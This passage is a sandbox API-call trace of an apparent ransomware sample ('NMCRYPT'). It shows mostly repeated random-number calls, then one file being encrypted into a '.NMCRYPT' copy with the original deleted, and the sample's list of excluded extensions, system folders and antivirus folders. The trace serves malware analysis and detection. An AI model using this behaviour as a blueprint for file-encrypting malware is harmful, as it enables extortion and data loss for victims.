pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.562] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.562] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.563] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0158.563] CryptHashData (hHash=0x9ad438, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.563] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad478) returned 1 [0158.563] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0158.563] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0158.563] wcslen (_String="\\\\?\\") returned 0x4 [0158.563] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad338) returned 1 [0158.563] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0158.563] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0158.564] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=694) returned 1 [0158.564] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0158.564] ReadFile (in: hFile=0x1624, lpBuffer=0x607e38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e38*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.565] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.565] GetLastError () returned 0x0 [0158.565] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.639] ReadFile (in: hFile=0x1624, lpBuffer=0x607e38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e38*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.639] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.639] GetLastError () returned 0x0 [0158.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.639] ReadFile (in: hFile=0x1624, lpBuffer=0x607e38, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e38*, lpNumberOfBytesRead=0x2d7dc80*=0xb6, lpOverlapped=0x0) returned 1 [0158.639] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xb6, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xc0) returned 1 [0158.639] GetLastError () returned 0x0 [0158.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xc0, lpOverlapped=0x0) returned 1 [0158.639] ReadFile (in: hFile=0x1624, lpBuffer=0x607e38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e38*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0158.640] WriteFile (in: hFile=0x588, lpBuffer=0x607e38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e38*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0158.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml")) returned 0x20 [0158.640] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", dwFileAttributes=0x20) returned 0 [0158.640] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 1 [0158.640] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml")) returned 0 [0158.640] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" [0158.640] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 1 [0158.640] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXDEF9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxdef9.tmp")) returned 0xdef9 [0158.712] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXDEF9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxdef9.tmp"), dwFlags=0x1) returned 0 [0158.712] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXDEF9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxdef9.tmp")) returned 1 [0158.712] CryptDestroyKey (hKey=0x9ad338) returned 1 [0158.713] wcslen (_String="OK") returned 0x2 [0158.713] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.713] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.713] CryptDestroyKey (hKey=0x9ad478) returned 1 [0158.713] CryptDestroyHash (hHash=0x9ad438) returned 1 [0158.713] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0158.713] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*NMCRYPT") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*Recovers your files.html") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*.exe") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*.dll") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*.lnk") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*.bat") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*.ini") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*.msi") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*.scf") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*pagefile.sys*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*NTUSER.DAT*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*AppData*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\winrar\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\java\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\windows\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\ESET\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\AVG\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\AVIRA\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*Atheros*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*Realtek*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*bootmgr*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*boot*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*boot*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*CONFIG.SYS*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*IO.SYS*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*MSDOS.SYS*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*NTDETECT.COM*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*ntldr*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*chrome*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*opera*") returned 0 [0158.713] PathMatchSpecW (pszFile="ja-jp-sym.xml", pszSpec="*firefox*") returned 0 [0158.713] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", pszSpec="*") returned 1 [0158.714] strlen (_Str="NMoreira") returned 